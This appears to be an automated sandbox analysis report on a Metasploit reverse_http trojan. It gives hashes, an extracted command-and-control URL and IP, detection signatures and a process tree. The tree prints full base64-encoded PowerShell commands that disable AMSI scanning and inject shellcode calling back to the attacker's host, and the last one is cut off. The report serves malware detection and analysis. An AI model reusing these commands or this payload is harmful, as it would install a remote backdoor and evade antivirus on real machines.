metasploit | fb6e630be6338a0eddec9b6c000ae5e874f7e465b1d7385923939da803b17036

Analysis

max time kernel
91s
max time network
137s
platform
windows10-2004_x64
resource
win10v2004-20220414-en
submitted
20-05-2022 03:16

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

fb6e630be6338a0eddec9b6c000ae5e874f7e465b1d7385923939da803b17036.exe
Size

84KB
MD5

c5ad0421f91222c171c271f87c6061f5
SHA1

519587e403dafb85f33f8490f64d6d6e6d035bb2
SHA256

fb6e630be6338a0eddec9b6c000ae5e874f7e465b1d7385923939da803b17036
SHA512

6e4bb50c2107965b2e0ab6defd7b78e808c1bf1a3b999f868c98e1ee20ca9c29687aa398b38a3ab37051dc1f570e995e7654208ad7cfe0e2af8d882e998f1010

Score

10^/10

metasploit backdoor trojan

Malware Config

Extracted

Family

metasploit

Version

windows/reverse_http

http://167.99.73.143:443/bgZP3X5UOnyPy47K0TMZLgqHarw2HV1Mi8x3WHXvunSTGmXe_NTMPb6-DnzwTFdUgSBn2UFjaet13vLREqp_PvHS3znEqaZOh2BARrqe2tSeR0-EYqUTqWgHFcPuDMO3EdNL-c5Ey5yRS4lHCzs9ZXyItJfYWMVNTvb51gjivgbGhj-Ew8gltksOVljKht7u

Signatures

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit
Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

15 2364 powershell.exe

flow	pid	process
15	2364	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

fb6e630be6338a0eddec9b6c000ae5e874f7e465b1d7385923939da803b17036.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Control Panel\International\Geo\Nation	fb6e630be6338a0eddec9b6c000ae5e874f7e465b1d7385923939da803b17036.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

1300 2364 WerFault.exe powershell.exe

pid	pid_target	process	target process
1300	2364	WerFault.exe	powershell.exe

Suspicious behavior: EnumeratesProcesses 10 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
2796	powershell.exe
2796	powershell.exe
988	powershell.exe
988	powershell.exe
1364	powershell.exe
1364	powershell.exe
1564	powershell.exe
1564	powershell.exe
2364	powershell.exe
2364	powershell.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	2796	powershell.exe
Token: SeDebugPrivilege	988	powershell.exe
Token: SeDebugPrivilege	1364	powershell.exe
Token: SeDebugPrivilege	1564	powershell.exe
Token: SeDebugPrivilege	2364	powershell.exe

Suspicious use of WriteProcessMemory 23 IoCs

Processes:

fb6e630be6338a0eddec9b6c000ae5e874f7e465b1d7385923939da803b17036.execmd.exepowershell.exepowershell.execsc.exepowershell.exepowershell.exepowershell.execsc.exe

description	pid	process	target process
PID 2328 wrote to memory of 2508	2328	fb6e630be6338a0eddec9b6c000ae5e874f7e465b1d7385923939da803b17036.exe	cmd.exe
PID 2328 wrote to memory of 2508	2328	fb6e630be6338a0eddec9b6c000ae5e874f7e465b1d7385923939da803b17036.exe	cmd.exe
PID 2508 wrote to memory of 2796	2508	cmd.exe	powershell.exe
PID 2508 wrote to memory of 2796	2508	cmd.exe	powershell.exe
PID 2796 wrote to memory of 988	2796	powershell.exe	powershell.exe
PID 2796 wrote to memory of 988	2796	powershell.exe	powershell.exe
PID 988 wrote to memory of 2908	988	powershell.exe	csc.exe
PID 988 wrote to memory of 2908	988	powershell.exe	csc.exe
PID 2908 wrote to memory of 4288	2908	csc.exe	cvtres.exe
PID 2908 wrote to memory of 4288	2908	csc.exe	cvtres.exe
PID 2508 wrote to memory of 1364	2508	cmd.exe	powershell.exe
PID 2508 wrote to memory of 1364	2508	cmd.exe	powershell.exe
PID 1364 wrote to memory of 1564	1364	powershell.exe	powershell.exe
PID 1364 wrote to memory of 1564	1364	powershell.exe	powershell.exe
PID 1564 wrote to memory of 2364	1564	powershell.exe	powershell.exe
PID 1564 wrote to memory of 2364	1564	powershell.exe	powershell.exe
PID 1564 wrote to memory of 2364	1564	powershell.exe	powershell.exe
PID 2364 wrote to memory of 1316	2364	powershell.exe	csc.exe
PID 2364 wrote to memory of 1316	2364	powershell.exe	csc.exe
PID 2364 wrote to memory of 1316	2364	powershell.exe	csc.exe
PID 1316 wrote to memory of 1592	1316	csc.exe	cvtres.exe
PID 1316 wrote to memory of 1592	1316	csc.exe	cvtres.exe
PID 1316 wrote to memory of 1592	1316	csc.exe	cvtres.exe

C:\Users\Admin\AppData\Local\Temp\fb6e630be6338a0eddec9b6c000ae5e874f7e465b1d7385923939da803b17036.exe
"C:\Users\Admin\AppData\Local\Temp\fb6e630be6338a0eddec9b6c000ae5e874f7e465b1d7385923939da803b17036.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2328

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\9AAE.tmp\powershell_attack.bat" "C:\Users\Admin\AppData\Local\Temp\fb6e630be6338a0eddec9b6c000ae5e874f7e465b1d7385923939da803b17036.exe""
2⤵
- Suspicious use of WriteProcessMemory
PID:2508

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell /w 1 /C "sv rbE -;sv MeX ec;sv EZj ((gv rbE).value.toString()+(gv MeX).value.toString());powershell (gv EZj).value.toString() ('JABZAHgAUABkAEQAVwAgAD0AIABAACIACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsAcAB1AGIAbABpAGMAIABjAGwAYQBzAHMAIABXAGkAbgAzADIAIAB7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAIgArACIAMgAiACsAIgAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEcAZQB0AFAAcgBvAGMAQQBkAGQAcgBlAHMAcwAoAEkAbgB0AFAAdAByACAAaABNAG8AZAB1AGwAZQAsACAAcwB0AHIAaQBuAGcAIABwAHIAbwBjAE4AYQBtAGUAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAIgArACIAMgAiACsAIgAiACkAXQAgAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAATABvAGEAZABMAGkAYgByAGEAcgB5ACgAcwB0AHIAaQBuAGcAIABuAGEAbQBlACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzACIAKwAiADIAIgArACIAIgApAF0AIABwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABiAG8AbwBsACAAVgBpAHIAdAB1AGEAbABQAHIAbwB0AGUAYwB0ACgASQBuAHQAUAB0AHIAIABsAHAAQQBkAGQAcgBlAHMAcwAsACAAVQBJAG4AdABQAHQAcgAgAGQAdwBTAGkAegBlACwAIAB1AGkAbgB0ACAAZgBsAE4AZQB3AFAAcgBvAHQAZQBjAHQALAAgAG8AdQB0ACAAdQBpAG4AdAAgAGwAcABmAGwATwBsAGQAUAByAG8AdABlAGMAdAApADsAfQAKACIAQAAKAEEAZABkAC0AVAB5AHAAZQAgACQAWQB4AFAAZABEAFcAOwAkAFgAdQB5AHYAdABIAGMAWgAgAD0AIABbAFcAaQBuADMAMgBdADoAOgBHAGUAdABQAHIAbwBjAEEAZABkAHIAZQBzAHMAKABbAFcAaQBuADMAMgBdADoAOgBMAG8AYQBkAEwAaQBiAHIAYQByAHkAKAAiAEEAbQBzACIAKwAiAGkAIgArACIALgAiACsAIgBkACIAKwAiAGwAbAAiACkALAAgACIAQQBtAHMAIgArACIAaQAiACsAIgBTACIAKwAiAGMAIgArACIAYQBuAEIAdQBmAGYAZQByACIAKQA7ACQAcABMAEMAYQBHAHUAcgAgAD0AIAAwADsAWwBXAGkAbgAzADIAXQA6ADoAVgBpAHIAdAB1AGEAbABQAHIAbwB0AGUAYwB0ACgAJABYAHUAeQB2AHQASABjAFoALAAgAFsAdQBpAG4AdAAzADIAXQA1ACwAIAAwAHgANAAwACwAIABbAHIAZQBmAF0AJABwAEwAQwBhAEcAdQByACkAOwAkAEwAeABoAG0AUQBrAHEAZQBNAEgAIAA9ACAAKAAiAH0AQgA4ACwAIAB9ADUANwAsACAAfQAwADAALAAgAH0AMAA3ACwAIAB9ADgAMAAsACAAfQBDADMAIgApAC4AcgBlAHAAbABhAGMAZQAoACIAfQAiACwAIAAiADAAeAAiACkAOwAkAEwAeABoAG0AUQBrAHEAZQBNAEgAIAA9ACAAWwBCAHkAdABlAFsAXQBdACgAJABMAHgAaABtAFEAawBxAGUATQBIACkALgBzAHAAbABpAHQAKAAiACwAIgApADsAWwBTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwAuAE0AYQByAHMAaABhAGwAXQA6ADoAQwBvAHAAeQAoACQATAB4AGgAbQBRAGsAcQBlAE0ASAAsACAAMAAsACAAJABYAHUAeQB2AHQASABjAFoALAAgADYAKQA=')"
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2796

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ec JABZAHgAUABkAEQAVwAgAD0AIABAACIACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsAcAB1AGIAbABpAGMAIABjAGwAYQBzAHMAIABXAGkAbgAzADIAIAB7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAIgArACIAMgAiACsAIgAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEcAZQB0AFAAcgBvAGMAQQBkAGQAcgBlAHMAcwAoAEkAbgB0AFAAdAByACAAaABNAG8AZAB1AGwAZQAsACAAcwB0AHIAaQBuAGcAIABwAHIAbwBjAE4AYQBtAGUAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAIgArACIAMgAiACsAIgAiACkAXQAgAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAATABvAGEAZABMAGkAYgByAGEAcgB5ACgAcwB0AHIAaQBuAGcAIABuAGEAbQBlACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzACIAKwAiADIAIgArACIAIgApAF0AIABwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABiAG8AbwBsACAAVgBpAHIAdAB1AGEAbABQAHIAbwB0AGUAYwB0ACgASQBuAHQAUAB0AHIAIABsAHAAQQBkAGQAcgBlAHMAcwAsACAAVQBJAG4AdABQAHQAcgAgAGQAdwBTAGkAegBlACwAIAB1AGkAbgB0ACAAZgBsAE4AZQB3AFAAcgBvAHQAZQBjAHQALAAgAG8AdQB0ACAAdQBpAG4AdAAgAGwAcABmAGwATwBsAGQAUAByAG8AdABlAGMAdAApADsAfQAKACIAQAAKAEEAZABkAC0AVAB5AHAAZQAgACQAWQB4AFAAZABEAFcAOwAkAFgAdQB5AHYAdABIAGMAWgAgAD0AIABbAFcAaQBuADMAMgBdADoAOgBHAGUAdABQAHIAbwBjAEEAZABkAHIAZQBzAHMAKABbAFcAaQBuADMAMgBdADoAOgBMAG8AYQBkAEwAaQBiAHIAYQByAHkAKAAiAEEAbQBzACIAKwAiAGkAIgArACIALgAiACsAIgBkACIAKwAiAGwAbAAiACkALAAgACIAQQBtAHMAIgArACIAaQAiACsAIgBTACIAKwAiAGMAIgArACIAYQBuAEIAdQBmAGYAZQByACIAKQA7ACQAcABMAEMAYQBHAHUAcgAgAD0AIAAwADsAWwBXAGkAbgAzADIAXQA6ADoAVgBpAHIAdAB1AGEAbABQAHIAbwB0AGUAYwB0ACgAJABYAHUAeQB2AHQASABjAFoALAAgAFsAdQBpAG4AdAAzADIAXQA1ACwAIAAwAHgANAAwACwAIABbAHIAZQBmAF0AJABwAEwAQwBhAEcAdQByACkAOwAkAEwAeABoAG0AUQBrAHEAZQBNAEgAIAA9ACAAKAAiAH0AQgA4ACwAIAB9ADUANwAsACAAfQAwADAALAAgAH0AMAA3ACwAIAB9ADgAMAAsACAAfQBDADMAIgApAC4AcgBlAHAAbABhAGMAZQAoACIAfQAiACwAIAAiADAAeAAiACkAOwAkAEwAeABoAG0AUQBrAHEAZQBNAEgAIAA9ACAAWwBCAHkAdABlAFsAXQBdACgAJABMAHgAaABtAFEAawBxAGUATQBIACkALgBzAHAAbABpAHQAKAAiACwAIgApADsAWwBTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwAuAE0AYQByAHMAaABhAGwAXQA6ADoAQwBvAHAAeQAoACQATAB4AGgAbQBRAGsAcQBlAE0ASAAsACAAMAAsACAAJABYAHUAeQB2AHQASABjAFoALAAgADYAKQA=
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:988

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\hcnqareq\hcnqareq.cmdline"
5⤵
- Suspicious use of WriteProcessMemory
PID:2908

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA618.tmp" "c:\Users\Admin\AppData\Local\Temp\hcnqareq\CSCED7090C1566048CDBFF4F4BBCC62DAB3.TMP"
6⤵
PID:4288

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell /w 1 /C "sv rbE -;sv MeX ec;sv EZj ((gv rbE).value.toString()+(gv MeX).value.toString());powershell (gv EZj).value.toString() ('JABOAGkAPQAnACQATABLAD0AJwAnAFsARABsAGwASQBtAHAAbwByAHQAKAAoACIAbQBzAHYAYwByACIAKwAiAHQAIgArACIALgBkAGwAbAAiACkAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAYwBhAGwAbABvAGMAKAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAAgAHUAaQBuAHQAIABhAG0AbwB1AG4AdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAIgArACIAbgAiACsAIgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByACIAKwAiAG4AIgArACIAZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABQAHIAbwB0AGUAYwB0ACgASQBuAHQAUAB0AHIAIABsAHAAUwB0AGEAcgB0AEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABOAGUAdwBQAHIAbwB0AGUAYwB0ACwAIABvAHUAdAAgAHUAaQBuAHQAIABpAEcAYQApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbQBzAHYAYwByACIAKwAiAHQAIgArACIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAG0AZQBtAHMAZQB0ACgASQBuAHQAUAB0AHIAIABkAGUAcwB0ACwAIAB1AGkAbgB0ACAAcwByAGMALAAgAHUAaQBuAHQAIABjAG8AdQBuAHQAKQA7ACcAJwA7ACQAcwBjAD0AIgB9AGUAOAAsAH0AOAAyACwAfQAwADAALAB9ADAAMAAsAH0AMAAwACwAfQA2ADAALAB9ADgAOQAsAH0AZQA1ACwAfQAzADEALAB9AGMAMAAsAH0ANgA0ACwAfQA4AGIALAB9ADUAMAAsAH0AMwAwACwAfQA4AGIALAB9ADUAMgAsAH0AMABjACwAfQA4AGIALAB9ADUAMgAsAH0AMQA0ACwAfQA4AGIALAB9ADcAMgAsAH0AMgA4ACwAfQAwAGYALAB9AGIANwAsAH0ANABhACwAfQAyADYALAB9ADMAMQAsAH0AZgBmACwAfQBhAGMALAB9ADMAYwAsAH0ANgAxACwAfQA3AGMALAB9ADAAMgAsAH0AMgBjACwAfQAyADAALAB9AGMAMQAsAH0AYwBmACwAfQAwAGQALAB9ADAAMQAsAH0AYwA3ACwAfQBlADIALAB9AGYAMgAsAH0ANQAyACwAfQA1ADcALAB9ADgAYgAsAH0ANQAyACwAfQAxADAALAB9ADgAYgAsAH0ANABhACwAfQAzAGMALAB9ADgAYgAsAH0ANABjACwAfQAxADEALAB9ADcAOAAsAH0AZQAzACwAfQA0ADgALAB9ADAAMQAsAH0AZAAxACwAfQA1ADEALAB9ADgAYgAsAH0ANQA5ACwAfQAyADAALAB9ADAAMQAsAH0AZAAzACwAfQA4AGIALAB9ADQAOQAsAH0AMQA4ACwAfQBlADMALAB9ADMAYQAsAH0ANAA5ACwAfQA4AGIALAB9ADMANAAsAH0AOABiACwAfQAwADEALAB9AGQANgAsAH0AMwAxACwAfQBmAGYALAB9AGEAYwAsAH0AYwAxACwAfQBjAGYALAB9ADAAZAAsAH0AMAAxACwAfQBjADcALAB9ADMAOAAsAH0AZQAwACwAfQA3ADUALAB9AGYANgAsAH0AMAAzACwAfQA3AGQALAB9AGYAOAAsAH0AMwBiACwAfQA3AGQALAB9ADIANAAsAH0ANwA1ACwAfQBlADQALAB9ADUAOAAsAH0AOABiACwAfQA1ADgALAB9ADIANAAsAH0AMAAxACwAfQBkADMALAB9ADYANgAsAH0AOABiACwAfQAwAGMALAB9ADQAYgAsAH0AOABiACwAfQA1ADgALAB9ADEAYwAsAH0AMAAxACwAfQBkADMALAB9ADgAYgAsAH0AMAA0ACwAfQA4AGIALAB9ADAAMQAsAH0AZAAwACwAfQA4ADkALAB9ADQANAAsAH0AMgA0ACwAfQAyADQALAB9ADUAYgAsAH0ANQBiACwAfQA2ADEALAB9ADUAOQAsAH0ANQBhACwAfQA1ADEALAB9AGYAZgAsAH0AZQAwACwAfQA1AGYALAB9ADUAZgAsAH0ANQBhACwAfQA4AGIALAB9ADEAMgAsAH0AZQBiACwAfQA4AGQALAB9ADUAZAAsAH0ANgA4ACwAfQA2AGUALAB9ADYANQAsAH0ANwA0ACwAfQAwADAALAB9ADYAOAAsAH0ANwA3ACwAfQA2ADkALAB9ADYAZQAsAH0ANgA5ACwAfQA1ADQALAB9ADYAOAAsAH0ANABjACwAfQA3ADcALAB9ADIANgAsAH0AMAA3ACwAfQBmAGYALAB9AGQANQAsAH0AMwAxACwAfQBkAGIALAB9ADUAMwAsAH0ANQAzACwAfQA1ADMALAB9ADUAMwAsAH0ANQAzACwAfQBlADgALAB9ADMAZQAsAH0AMAAwACwAfQAwADAALAB9ADAAMAAsAH0ANABkACwAfQA2AGYALAB9ADcAYQAsAH0ANgA5ACwAfQA2AGMALAB9ADYAYwAsAH0ANgAxACwAfQAyAGYALAB9ADMANQAsAH0AMgBlACwAfQAzADAALAB9ADIAMAAsAH0AMgA4ACwAfQA1ADcALAB9ADYAOQAsAH0ANgBlACwAfQA2ADQALAB9ADYAZgAsAH0ANwA3ACwAfQA3ADMALAB9ADIAMAAsAH0ANABlACwAfQA1ADQALAB9ADIAMAAsAH0AMwA2ACwAfQAyAGUALAB9ADMAMQAsAH0AMwBiACwAfQAyADAALAB9ADUANAAsAH0ANwAyACwAfQA2ADkALAB9ADYANAAsAH0ANgA1ACwAfQA2AGUALAB9ADcANAAsAH0AMgBmACwAfQAzADcALAB9ADIAZQAsAH0AMwAwACwAfQAzAGIALAB9ADIAMAAsAH0ANwAyACwAfQA3ADYALAB9ADMAYQAsAH0AMwAxACwAfQAzADEALAB9ADIAZQAsAH0AMwAwACwAfQAyADkALAB9ADIAMAAsAH0ANgBjACwAfQA2ADkALAB9ADYAYgAsAH0ANgA1ACwAfQAyADAALAB9ADQANwAsAH0ANgA1ACwAfQA2ADMALAB9ADYAYgAsAH0ANgBmACwAfQAwADAALAB9ADYAOAAsAH0AMwBhACwAfQA1ADYALAB9ADcAOQAsAH0AYQA3ACwAfQBmAGYALAB9AGQANQAsAH0ANQAzACwAfQA1ADMALAB9ADYAYQAsAH0AMAAzACwAfQA1ADMALAB9ADUAMwAsAH0ANgA4ACwAfQBiAGIALAB9ADAAMQAsAH0AMAAwACwAfQAwADAALAB9AGUAOAAsAH0ANQAxACwAfQAwADEALAB9ADAAMAAsAH0AMAAwACwAfQAyAGYALAB9ADYAMgAsAH0ANgA3ACwAfQA1AGEALAB9ADUAMAAsAH0AMwAzACwAfQA1ADgALAB9ADMANQAsAH0ANQA1ACwAfQA0AGYALAB9ADYAZQAsAH0ANwA5ACwAfQ'+'A1ADAALAB9ADcAOQAsAH0AMwA0ACwAfQAzADcALAB9ADQAYgAsAH0AMwAwACwAfQA1ADQALAB9ADQAZAAsAH0ANQBhACwAfQA0AGMALAB9ADYANwAsAH0ANwAxACwAfQA0ADgALAB9ADYAMQAsAH0ANwAyACwAfQA3ADcALAB9ADMAMgAsAH0ANAA4ACwAfQA1ADYALAB9ADMAMQAsAH0ANABkACwAfQA2ADkALAB9ADMAOAAsAH0ANwA4ACwAfQAzADMALAB9ADUANwAsAH0ANAA4ACwAfQA1ADgALAB9ADcANgAsAH0ANwA1ACwAfQA2AGUALAB9ADUAMwAsAH0ANQA0ACwAfQA0ADcALAB9ADYAZAAsAH0ANQA4ACwAfQA2ADUALAB9ADUAZgAsAH0ANABlACwAfQA1ADQALAB9ADQAZAAsAH0ANQAwACwAfQA2ADIALAB9ADMANgAsAH0AMgBkACwAfQA0ADQALAB9ADYAZQAsAH0ANwBhACwAfQA3ADcALAB9ADUANAAsAH0ANAA2ACwAfQA2ADQALAB9ADUANQAsAH0ANgA3ACwAfQA1ADMALAB9ADQAMgAsAH0ANgBlACwAfQAzADIALAB9ADUANQAsAH0ANAA2ACwAfQA2AGEALAB9ADYAMQAsAH0ANgA1ACwAfQA3ADQALAB9ADMAMQAsAH0AMwAzACwAfQA3ADYALAB9ADQAYwAsAH0ANQAyACwAfQA0ADUALAB9ADcAMQAsAH0ANwAwACwAfQA1AGYALAB9ADUAMAAsAH0ANwA2ACwAfQA0ADgALAB9ADUAMwAsAH0AMwAzACwAfQA3AGEALAB9ADYAZQAsAH0ANAA1ACwAfQA3ADEALAB9ADYAMQAsAH0ANQBhACwAfQA0AGYALAB9ADYAOAAsAH0AMwAyACwAfQA0ADIALAB9ADQAMQAsAH0ANQAyACwAfQA3ADIALAB9ADcAMQAsAH0ANgA1ACwAfQAzADIALAB9ADcANAAsAH0ANQAzACwAfQA2ADUALAB9ADUAMgAsAH0AMwAwACwAfQAyAGQALAB9ADQANQAsAH0ANQA5ACwAfQA3ADEALAB9ADUANQAsAH0ANQA0ACwAfQA3ADEALAB9ADUANwAsAH0ANgA3ACwAfQA0ADgALAB9ADQANgAsAH0ANgAzACwAfQA1ADAALAB9ADcANQAsAH0ANAA0ACwAfQA0AGQALAB9ADQAZgAsAH0AMwAzACwAfQA0ADUALAB9ADYANAAsAH0ANABlACwAfQA0AGMALAB9ADIAZAAsAH0ANgAzACwAfQAzADUALAB9ADQANQAsAH0ANwA5ACwAfQAzADUALAB9ADcAOQAsAH0ANQAyACwAfQA1ADMALAB9ADMANAAsAH0ANgBjACwAfQA0ADgALAB9ADQAMwAsAH0ANwBhACwAfQA3ADMALAB9ADMAOQAsAH0ANQBhACwAfQA1ADgALAB9ADcAOQAsAH0ANAA5ACwAfQA3ADQALAB9ADQAYQAsAH0ANgA2ACwAfQA1ADkALAB9ADUANwAsAH0ANABkACwAfQA1ADYALAB9ADQAZQAsAH0ANQA0ACwAfQA3ADYALAB9ADYAMgAsAH0AMwA1ACwAfQAzADEALAB9ADYANwAsAH0ANgBhACwAfQA2ADkALAB9ADcANgAsAH0ANgA3ACwAfQA2ADIALAB9ADQANwAsAH0ANgA4ACwAfQA2AGEALAB9ADIAZAAsAH0ANAA1ACwAfQA3ADcALAB9ADMAOAAsAH0ANgA3ACwAfQA2AGMALAB9ADcANAAsAH0ANgBiACwAfQA3ADMALAB9ADQAZgAsAH0ANQA2ACwAfQA2AGMALAB9ADYAYQAsAH0ANABiACwAfQA2ADgALAB9ADcANAAsAH0AMwA3ACwAfQA3ADUALAB9ADAAMAAsAH0ANQAwACwAfQA2ADgALAB9ADUANwAsAH0AOAA5ACwAfQA5AGYALAB9AGMANgAsAH0AZgBmACwAfQBkADUALAB9ADgAOQAsAH0AYwA2ACwAfQA1ADMALAB9ADYAOAAsAH0AMAAwACwAfQAzADIALAB9AGUAMAAsAH0AOAA0ACwAfQA1ADMALAB9ADUAMwAsAH0ANQAzACwAfQA1ADcALAB9ADUAMwAsAH0ANQA2ACwAfQA2ADgALAB9AGUAYgAsAH0ANQA1ACwAfQAyAGUALAB9ADMAYgAsAH0AZgBmACwAfQBkADUALAB9ADkANgAsAH0ANgBhACwAfQAwAGEALAB9ADUAZgAsAH0ANgA4ACwAfQA4ADAALAB9ADMAMwAsAH0AMAAwACwAfQAwADAALAB9ADgAOQAsAH0AZQAwACwAfQA2AGEALAB9ADAANAAsAH0ANQAwACwAfQA2AGEALAB9ADEAZgAsAH0ANQA2ACwAfQA2ADgALAB9ADcANQAsAH0ANAA2ACwAfQA5AGUALAB9ADgANgAsAH0AZgBmACwAfQBkADUALAB9ADUAMwAsAH0ANQAzACwAfQA1ADMALAB9ADUAMwAsAH0ANQA2ACwAfQA2ADgALAB9ADIAZAAsAH0AMAA2ACwAfQAxADgALAB9ADcAYgAsAH0AZgBmACwAfQBkADUALAB9ADgANQAsAH0AYwAwACwAfQA3ADUALAB9ADEANAAsAH0ANgA4ACwAfQA4ADgALAB9ADEAMwAsAH0AMAAwACwAfQAwADAALAB9ADYAOAAsAH0ANAA0ACwAfQBmADAALAB9ADMANQAsAH0AZQAwACwAfQBmAGYALAB9AGQANQAsAH0ANABmACwAfQA3ADUALAB9AGMAZAAsAH0AZQA4ACwAfQA0AGEALAB9ADAAMAAsAH0AMAAwACwAfQAwADAALAB9ADYAYQAsAH0ANAAwACwAfQA2ADgALAB9ADAAMAAsAH0AMQAwACwAfQAwADAALAB9ADAAMAAsAH0ANgA4ACwAfQAwADAALAB9ADAAMAAsAH0ANAAwACwAfQAwADAALAB9ADUAMwAsAH0ANgA4ACwAfQA1ADgALAB9AGEANAAsAH0ANQAzACwAfQBlADUALAB9AGYAZgAsAH0AZAA1ACwAfQA5ADMALAB9ADUAMwAsAH0ANQAzACwAfQA4ADkALAB9AGUANwAsAH0ANQA3ACwAfQA2ADgALAB9ADAAMAAsAH0AMgAwACwAfQAwADAALAB9ADAAMAAsAH0ANQAzACwAfQA1ADYALAB9ADYAOAAsAH0AMQAyACwAfQA5ADYALAB9ADgAOQAsAH0AZQAyACwAfQBmAGYALAB9AGQANQAsAH0AOAA1ACwAfQBjADAALAB9ADcANAAsAH0AYwBmACwAfQA4AGIALAB9ADAANwAsAH0AMAAxACwAfQBjADMALAB9ADgANQAsAH0AYwAwACwAfQA3ADUALAB9AGUANQAsAH0ANQA4ACwAfQBjADMALAB9ADUAZgAsAH0AZQA4ACwAfQA2AGIALAB9AGYAZgAsAH0AZgBmACwAfQBmAGYALAB9ADMAMQAsAH0AMwA2ACwAfQAzADcALAB9ADIAZQAsAH0AMwA5ACwAfQAzADkALAB9ADIAZQAsA